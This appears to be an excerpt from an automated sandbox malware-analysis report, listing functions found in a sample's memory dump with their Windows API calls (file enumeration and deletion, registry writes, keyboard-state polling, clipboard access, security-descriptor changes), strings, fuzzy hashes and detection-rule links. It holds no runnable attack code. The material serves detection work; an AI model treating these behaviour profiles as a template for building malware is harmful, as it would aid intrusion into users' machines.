Opcode Fuzzy Hash: 964f58c9cdfca430807cf33729d3126d33ebe8af800b8a09476c1e522e0f285e
Instruction Fuzzy Hash: BDA11DB1508344ABC710EFA4CC86DAFB7ECAF94704F404919F59587192EA78DA09EB62

Function 00F6EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00F6EFB6
_wcscmp.LIBCMT ref: 00F6EFCB
_wcscmp.LIBCMT ref: 00F6EFE2
GetFileAttributesW.KERNEL32(?), ref: 00F6EFF4
SetFileAttributesW.KERNEL32(?,?), ref: 00F6F00E
FindNextFileW.KERNEL32(00000000,?), ref: 00F6F026
FindClose.KERNEL32(00000000), ref: 00F6F031
FindFirstFileW.KERNEL32(*.*,?), ref: 00F6F04D
_wcscmp.LIBCMT ref: 00F6F074
_wcscmp.LIBCMT ref: 00F6F08B
SetCurrentDirectoryW.KERNEL32(?), ref: 00F6F09D
SetCurrentDirectoryW.KERNEL32(00FB8920), ref: 00F6F0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 00F6F0C5
FindClose.KERNEL32(00000000), ref: 00F6F0D2
FindClose.KERNEL32(00000000), ref: 00F6F0E4

Strings

*.*, xrefs: 00F6F048

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 996ff1d9c84e0af6c83dc0f1cbe2e670c95c353cccf024c934c912e358e8f01e
Instruction ID: cdb479caffcc77159abdb5f957b1142929504b4d398a33bbd4e2bba4e97055c1
Opcode Fuzzy Hash: 996ff1d9c84e0af6c83dc0f1cbe2e670c95c353cccf024c934c912e358e8f01e
Instruction Fuzzy Hash: 9E31A23290121D7FDF14EFA4EC49AEE77AC9F49360F144175E805E20A1DB74DA88EB61

Function 00F80857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F80953
RegCreateKeyExW.ADVAPI32(?,?,00000000,00F8F910,00000000,?,00000000,?,?), ref: 00F809C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00F80A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00F80A92
RegCloseKey.ADVAPI32(?), ref: 00F80DB2
RegCloseKey.ADVAPI32(00000000), ref: 00F80DBF

Strings

REG_MULTI_SZ, xrefs: 00F80B7A
REG_SZ, xrefs: 00F80AD0
REG_EXPAND_SZ, xrefs: 00F80A2F
REG_QWORD, xrefs: 00F80D00
REG_DWORD, xrefs: 00F80C83
REG_BINARY, xrefs: 00F80D4D

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: b3da8a29ca7c738dee1c0e903340565a52c29b4082778ab13f0db26308041fc2
Instruction ID: 9f5aa3256af274efa5182274226a1fa96325652e424bb57ad8dbf3156312376b
Opcode Fuzzy Hash: b3da8a29ca7c738dee1c0e903340565a52c29b4082778ab13f0db26308041fc2
Instruction Fuzzy Hash: A4029C756046019FCB54EF24C841E6AB7E5FF89320F44885CF88A9B3A2DB74ED45EB81

Function 00F6F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00F6F113
_wcscmp.LIBCMT ref: 00F6F128
_wcscmp.LIBCMT ref: 00F6F13F

Part of subcall function 00F64385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F643A0

FindNextFileW.KERNEL32(00000000,?), ref: 00F6F16E
FindClose.KERNEL32(00000000), ref: 00F6F179
FindFirstFileW.KERNEL32(*.*,?), ref: 00F6F195
_wcscmp.LIBCMT ref: 00F6F1BC
_wcscmp.LIBCMT ref: 00F6F1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 00F6F1E5
SetCurrentDirectoryW.KERNEL32(00FB8920), ref: 00F6F203
FindNextFileW.KERNEL32(00000000,00000010), ref: 00F6F20D
FindClose.KERNEL32(00000000), ref: 00F6F21A
FindClose.KERNEL32(00000000), ref: 00F6F22C

Strings

*.*, xrefs: 00F6F190

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 120664ed2e01e0d437e511f3df3b7ccabb6df4da82bd433c563e53a044061117
Instruction ID: 31d8113e49b3ca9e04ac911ed56708a44740a7fd3de1e79efe1e1f856cab033e
Opcode Fuzzy Hash: 120664ed2e01e0d437e511f3df3b7ccabb6df4da82bd433c563e53a044061117
Instruction Fuzzy Hash: 4131823690021E6EDF10AEA4FC59AEE77AC9F85370F140175E904E21A0DB34DA49EF65

Function 00F6A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F6A20F
__swprintf.LIBCMT ref: 00F6A231
CreateDirectoryW.KERNEL32(?,00000000), ref: 00F6A26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F6A293
_memset.LIBCMT ref: 00F6A2B2
_wcsncpy.LIBCMT ref: 00F6A2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00F6A323
CloseHandle.KERNEL32(00000000), ref: 00F6A32E
RemoveDirectoryW.KERNEL32(?), ref: 00F6A337
CloseHandle.KERNEL32(00000000), ref: 00F6A341

Strings

\??\%s, xrefs: 00F6A22B
:, xrefs: 00F6A252
\, xrefs: 00F6A247

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: d3105bed18d23f4a13ec3b6ac078fe775c7907d71fb75afdb6df0b2d29e1021a
Instruction ID: 809a0152be25844bd86a167f290ab60b4b699fe739d816b7b2172f6db6a0f5fc
Opcode Fuzzy Hash: d3105bed18d23f4a13ec3b6ac078fe775c7907d71fb75afdb6df0b2d29e1021a
Instruction Fuzzy Hash: 2131B0B1900119ABDB20DFA0DC49FEB77BCEF88750F1040B6F508E2160EB759648AB25

Function 00F57CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F58202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F5821E
Part of subcall function 00F58202: GetLastError.KERNEL32(?,00F57CE2,?,?,?), ref: 00F58228
Part of subcall function 00F58202: GetProcessHeap.KERNEL32(00000008,?,?,00F57CE2,?,?,?), ref: 00F58237
Part of subcall function 00F58202: HeapAlloc.KERNEL32(00000000,?,00F57CE2,?,?,?), ref: 00F5823E
Part of subcall function 00F58202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F58255

Part of subcall function 00F5829F: GetProcessHeap.KERNEL32(00000008,00F57CF8,00000000,00000000,?,00F57CF8,?), ref: 00F582AB
Part of subcall function 00F5829F: HeapAlloc.KERNEL32(00000000,?,00F57CF8,?), ref: 00F582B2
Part of subcall function 00F5829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00F57CF8,?), ref: 00F582C3

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F57D13
_memset.LIBCMT ref: 00F57D28
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F57D47
GetLengthSid.ADVAPI32(?), ref: 00F57D58
GetAce.ADVAPI32(?,00000000,?), ref: 00F57D95
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F57DB1
GetLengthSid.ADVAPI32(?), ref: 00F57DCE
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00F57DDD
HeapAlloc.KERNEL32(00000000), ref: 00F57DE4
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F57E05
CopySid.ADVAPI32(00000000), ref: 00F57E0C
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F57E3D
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F57E63
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F57E77

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 9bee42c56c271632b5aa702aaaeb583aaa09b27ab6ce871ddc447ba6a8a36604
Instruction ID: 558d70c15e48c67e092aa0358c0a8fd54de596fad5324ebb7386d8fbd43f62ac
Opcode Fuzzy Hash: 9bee42c56c271632b5aa702aaaeb583aaa09b27ab6ce871ddc447ba6a8a36604
Instruction Fuzzy Hash: 01616A71904209AFDF00DFA1EC85AFEBB79FF04311F148169FA15A6291DB359E09EB60

Function 00F166E1 Relevance: 18.4, Strings: 14, Instructions: 889COMMON

Download Yara Rule

Strings

CRLF), xrefs: 00F512C1
UTF), xrefs: 00F510FA
ANY), xrefs: 00F512DE
LIMIT_MATCH=, xrefs: 00F51170
ANYCRLF), xrefs: 00F512FB
LF), xrefs: 00F512A4
CR), xrefs: 00F51287
UTF16), xrefs: 00F510CF
LIMIT_RECURSION=, xrefs: 00F511FC
NO_AUTO_POSSESS), xrefs: 00F5112E
BSR_ANYCRLF), xrefs: 00F5131E
UCP), xrefs: 00F5110D
BSR_UNICODE), xrefs: 00F51338
NO_START_OPT), xrefs: 00F5114F

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: c508305bfb7a8aee55717990092f7a2e535bb253264825b95dce497561d04e29
Instruction ID: 58391fe7d1fa041d4fb8f5ba6458e4b031c7577c57f1df86b3855e786036b791
Opcode Fuzzy Hash: c508305bfb7a8aee55717990092f7a2e535bb253264825b95dce497561d04e29
Instruction Fuzzy Hash: 4472A076E00219DBDB14CF59C8807EEB7B5FF48321F14816AE905EB281EB749D85EB90

Function 00F6001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00F60097
SetKeyboardState.USER32(?), ref: 00F60102
GetAsyncKeyState.USER32(000000A0), ref: 00F60122
GetKeyState.USER32(000000A0), ref: 00F60139
GetAsyncKeyState.USER32(000000A1), ref: 00F60168
GetKeyState.USER32(000000A1), ref: 00F60179
GetAsyncKeyState.USER32(00000011), ref: 00F601A5
GetKeyState.USER32(00000011), ref: 00F601B3
GetAsyncKeyState.USER32(00000012), ref: 00F601DC
GetKeyState.USER32(00000012), ref: 00F601EA
GetAsyncKeyState.USER32(0000005B), ref: 00F60213
GetKeyState.USER32(0000005B), ref: 00F60221

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: ddc15e9b48eabec6c82eaa2c59ad98b656b993c5e5b6d612c35b7c6e735cc1e5
Instruction ID: 921768a5ec0ea722724b19ad9416bc29690112d9debf454bc75cdc9585bcbf98
Opcode Fuzzy Hash: ddc15e9b48eabec6c82eaa2c59ad98b656b993c5e5b6d612c35b7c6e735cc1e5
Instruction Fuzzy Hash: 5D51F930D0478829FB35DBA088157EBBFB49F12390F18459ED5C25B1C2DEA49B8CE761

Function 00F803DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F80E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F7FDAD,?,?), ref: 00F80E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F804AC

Part of subcall function 00F09837: __itow.LIBCMT ref: 00F09862
Part of subcall function 00F09837: __swprintf.LIBCMT ref: 00F098AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F8054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F805E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00F80822
RegCloseKey.ADVAPI32(00000000), ref: 00F8082F

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: a907350359f54805dd41876341cf5270ef5732857b86eac8a7b5c91bb55adc4f
Instruction ID: 6f514969d0fbe017b024680e6d9f23be397fdff328b86491e08a012855bbbda0
Opcode Fuzzy Hash: a907350359f54805dd41876341cf5270ef5732857b86eac8a7b5c91bb55adc4f
Instruction Fuzzy Hash: 68E17F71604204AFCB54EF24CC91E6ABBE4EF89314F44856DF849DB2A2DB34E845EB91

Function 00F783BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00F09837: __itow.LIBCMT ref: 00F09862
Part of subcall function 00F09837: __swprintf.LIBCMT ref: 00F098AC

CoInitialize.OLE32 ref: 00F78403
CoUninitialize.OLE32 ref: 00F7840E
CoCreateInstance.OLE32(?,00000000,00000017,00F92BEC,?), ref: 00F7846E
IIDFromString.OLE32(?,?), ref: 00F784E1
VariantInit.OLEAUT32(?), ref: 00F7857B
VariantClear.OLEAUT32(?), ref: 00F785DC

Strings

Failed to create object, xrefs: 00F78479, 00F7852F
Invalid parameter, xrefs: 00F784FA
NULL Pointer assignment, xrefs: 00F784B3

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 83924dda25eebc7810161ad76e13570cf7dd1bcf532e1ee021fd2852272ef005
Instruction ID: acb1a359d23963c85141eb435447a27feb77869e423a7cf66c54c771c0b0ab5a
Opcode Fuzzy Hash: 83924dda25eebc7810161ad76e13570cf7dd1bcf532e1ee021fd2852272ef005
Instruction Fuzzy Hash: DB61E2716083129FC710DF14C848F6AB7E8AF487A4F04841EF9899B291DB74ED49EB93

Function 00F74164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00F7418B
EmptyClipboard.USER32 ref: 00F74191
GlobalAlloc.KERNEL32(00000002,?), ref: 00F741A6
CloseClipboard.USER32 ref: 00F74245

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 619c557c6b73c8341837fc8409080f5f6d682e19dc1240146a928a48032175c9
Instruction ID: b07b7e227b69017ec83c2c5ada280625883bd9c713646633a086ce82a38a994e
Opcode Fuzzy Hash: 619c557c6b73c8341837fc8409080f5f6d682e19dc1240146a928a48032175c9
Instruction Fuzzy Hash: 4421A3756002149FDB11AF64DC09BBD7BA8EF04721F54C02AF94ADB2A2EB74BC40EB55

Function 00F637EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F04743,?,?,00F037AE,?), ref: 00F04770

Part of subcall function 00F64A31: GetFileAttributesW.KERNEL32(?,00F6370B), ref: 00F64A32

FindFirstFileW.KERNEL32(?,?), ref: 00F638A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00F6394B
MoveFileW.KERNEL32(?,?), ref: 00F6395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00F6397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00F6399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00F639B9

Strings

\*.*, xrefs: 00F6384E, 00F63857, 00F6386C

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: fd9162c4c1f0448cef005ba820419e3d8029891355f91af81a5fa80a0cfdbefc
Instruction ID: 64606b3e616a76e6368e89f8bc773e48320bf4134151b97f386aaca3863c4c8f
Opcode Fuzzy Hash: fd9162c4c1f0448cef005ba820419e3d8029891355f91af81a5fa80a0cfdbefc
Instruction Fuzzy Hash: 68516931C0514DAACF05FBA0DD929EEB779AF15310F6000A9E402B6192EB696F0DFF61

Function 00F6F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00F6F440
Sleep.KERNEL32(0000000A), ref: 00F6F470
_wcscmp.LIBCMT ref: 00F6F484
_wcscmp.LIBCMT ref: 00F6F49F
FindNextFileW.KERNEL32(?,?), ref: 00F6F53D
FindClose.KERNEL32(00000000), ref: 00F6F553

Strings

*.*, xrefs: 00F6F425

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: d1040563f7407e937eb59bfb9db171072d1c8aa898d1a43041ef4489d82fef5a
Instruction ID: f7311ad19591068435da0ec15e8f3a749cb134ab285696cee6db3fa53981d64d
Opcode Fuzzy Hash: d1040563f7407e937eb59bfb9db171072d1c8aa898d1a43041ef4489d82fef5a
Instruction Fuzzy Hash: D3414A72D0421AAFDF14EF64EC45AEEBBB4EF05320F144466E815A2191EB34AE49EB50

Function 00F15760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F158A5
_memmove.LIBCMT ref: 00F158F5
_memmove.LIBCMT ref: 00F1595B

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
